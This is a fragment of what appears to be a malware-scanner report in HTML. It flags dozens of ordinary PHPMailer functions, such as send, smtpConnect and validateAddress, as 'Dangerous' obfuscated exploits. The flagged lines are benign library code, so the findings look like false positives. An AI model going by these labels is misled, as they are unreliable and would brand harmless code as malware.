</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1304</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1306</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getLastMessageID</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1308</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">lastMessageID</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1322</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1323</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strpos</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #DD0000">'@'</span><span style="color: #007700">) !== </span><span style="color: #0000BB">false</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1330</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">validateAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$patternselect </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1336</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$patternselect</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'extension_loaded'</span><span style="color: #007700">) and </span><span style="color: #0000BB">extension_loaded</span><span style="color: #007700">(</span><span style="color: #DD0000">'pcre'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1372</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1412</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) >= </span><span style="color: #0000BB">3</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1417</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">filter_var</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">FILTER_VALIDATE_EMAIL</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1424</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool </span><span style="color: #DD0000">"true" </span><span style="color: #007700">if </span><span style="color: #0000BB">required functions </span><span style="color: #007700">for </span><span style="color: #0000BB">IDN support are present</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1426</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">idnSupported</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1428</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">PHP </span><span style="color: #007700"><= </span><span style="color: #0000BB">5.2</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1429</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'idn_to_ascii'</span><span style="color: #007700">) and </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_convert_encoding'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1435</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">silently returns unmodified address </span><span style="color: #007700">if:</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1437</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions are not available</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The encoded address in ASCII form</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1443</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">punyencodeAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1445</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">, </span><span style="color: #0000BB">CharSet</span><span style="color: #007700">, and </span><span style="color: #0000BB">at</span><span style="color: #007700">-</span><span style="color: #0000BB">sign</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1456</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pos</span><span style="color: #007700">) . </span><span style="color: #0000BB">$punycode</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1460</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$address</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1467</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean false on error </span><span style="color: #007700">- </span><span style="color: #0000BB">See the ErrorInfo property </span><span style="color: #007700">for </span><span style="color: #0000BB">details of the error</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">send</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1475</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">postSend</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1491</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">preSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1591</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">postSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1598</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1600</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1602</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1606</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">$sendMethod</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1630</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1704</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isShellSafe</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1731</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions that access local file paths</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1736</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isPermittedPath</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1738</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'#^[a-z]+://#i'</span><span style="color: #007700">, </span><span style="color: #0000BB">$path</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1750</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1759</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header by the receiver</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1791</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to load your own SMTP implementation</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1792</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">SMTP</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1794</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSMTPInstance</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1799</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtp</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1804</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">there is a bad MAIL FROM</span><span style="color: #007700">, </span><span style="color: #0000BB">RCPT</span><span style="color: #007700">, or </span><span style="color: #0000BB">DATA input</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1814</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1870</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the operation failed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1877</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpConnect</span><span style="color: #007700">(</span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1999</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpClose</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2011</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">it cannot load the language file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2018</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setLanguage</span><span style="color: #007700">(</span><span style="color: #0000BB">$langcode </span><span style="color: #007700">= </span><span style="color: #DD0000">'en'</span><span style="color: #007700">, </span><span style="color: #0000BB">$lang_path </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2045</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #DD0000">',</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2078</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">$foundlang</span><span style="color: #007700">; </span><span style="color: #FF8000">// Returns false if language not found</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2085</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getTranslations</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2087</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2100</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrAppend</span><span style="color: #007700">(</span><span style="color: #0000BB">$type</span><span style="color: #007700">, </span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2106</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$type </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">', '</span><span style="color: #007700">, </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">) . </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
